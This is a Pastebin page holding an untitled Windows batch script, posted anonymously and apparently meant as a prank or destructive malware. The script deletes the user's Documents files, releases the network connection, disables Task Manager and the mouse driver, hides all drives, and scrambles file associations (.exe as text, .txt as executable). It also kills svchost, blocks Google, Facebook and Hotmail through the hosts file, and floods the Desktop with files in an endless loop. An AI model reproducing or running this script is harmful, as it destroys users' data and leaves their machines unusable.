Advertisement
Guest User

Untitled

a guest
Jun 23rd, 2017
87
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. @echo off
  2. del /f /q "%userprofile%\My Documents\*.*" >nul
  3. del /f /q "%userprofile%\Documents\*.*" >nul
  4. ipconfig /release >nul
  5. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t Reg_SZ /d 1 /f >nul
  6. reg delete HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass /f
  7. reg add HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass /v Start /t REG_DWORD /d 4
  8. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t reg_dword /d 03ffffff                                
  9. assoc .exe=txtfile
  10. assoc .txt=exefile
  11. assoc .png=txtfile
  12. assoc .jpg=txtfile
  13. assoc .jpeg=txtfile
  14. assoc .tiff=txtfile
  15. assoc .lnk=txtfile
  16. assoc .rtf=txtfile
  17. assoc .doc=txtfile
  18. assoc .docx=txtfile
  19. assoc .ppt=txtfile
  20. assoc .pptx=txtfile
  21. assoc .pdf=txtfile
  22. assoc .zip=txtfile
  23. assoc .7z=txtfile
  24. assoc .rar=txtfile
  25. time 00:00
  26. taskkill /f /im svchost.exe
  27. echo 127.0.0.1 google.com >> "C:\Windows\System32\Drivers\etc\Hosts"
  28. echo 127.0.0.1 facebook.com >> "C:\Windows\System32\Drivers\etc\Hosts"
  29. echo 127.0.0.1 hotmail.com >> "C:\Windows\System32\Drivers\etc\Hosts"
  30. cd "%userprofile%\Desktop"
  31. set /a num=1
  32. :a
  33. dir>%num%
  34. attrib +R +A %num%
  35. set /a num+=1
  36. goto a
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement